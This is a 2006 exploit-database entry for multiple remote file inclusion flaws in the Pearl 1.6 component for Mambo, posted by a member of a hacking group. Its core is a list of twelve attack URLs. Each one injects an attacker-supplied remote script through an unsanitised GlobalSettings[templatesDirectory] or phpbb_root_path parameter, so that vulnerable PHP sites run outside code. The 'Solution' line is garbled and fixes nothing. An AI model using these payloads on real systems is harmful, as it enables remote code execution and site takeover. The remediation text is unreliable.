Mambo Component Pearl 1.6 - Multiple Remote File Inclusions
Author: Kw3[R]Ln
type: webapps
platform: php
port:
date_added: 2006-06-26
date_updated:
verified: 1
codes: OSVDB-27204;CVE-2006-3340;OSVDB-27201;OSVDB-27200;OSVDB-27199;OSVDB-27198;OSVDB-27197;OSVDB-27196;OSVDB-27195;OSVDB-27194;OSVDB-27193;OSVDB-27192;OSVDB-27191;OSVDB-27190;OSVDB-27189;OSVDB-27188;OSVDB-27187;OSVDB-27186;OSVDB-27185;OSVDB-27184;OSVDB-27183;OSVDB-27182;OSVDB-27181;OSVDB-27180;OSVDB-27179;OSVDB-27178;OSVDB-27177;OSVDB-27176;OSVDB-27175;OSVDB-27174;OSVDB-27173;OSVDB-27172;OSVDB-27171;OSVDB-27170;OSVDB-27169;OSVDB-27168
tags:
aliases:
screenshot_url:
application_url:
---------------------------------------------------------------------------
Pearl For Mambo <= 1.6 (GlobalSettings[templatesDirectory]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Pearl For Mambo
version : latest version [ 1.6 ]
Description: component for mambo
URL : http://www.pearlinger.com
------------------------------------------------------------------
Exploit:
~~~~~~~
Variable $GlobalSettings[templatesDirectory] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
# http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]
# http://www.site.com/[path]/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminForums.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/move.php?GlobalSettings[templatesDirectory]=[evil_script]
---------------------------------------------------------------------------
Solution :
~~~~~~~~~
declare variabel $[evil_script]
---------------------------------------------------------------------------
Shoutz:
~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://RoSecurityGroup.net ]
---------------------------------------------------------------------------
*/
Contact:
~~~~~~~
Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RoSecurityGroup.net
/*
-------------------------------- [ EOF] ----------------------------------
# milw0rm.com [2006-06-27]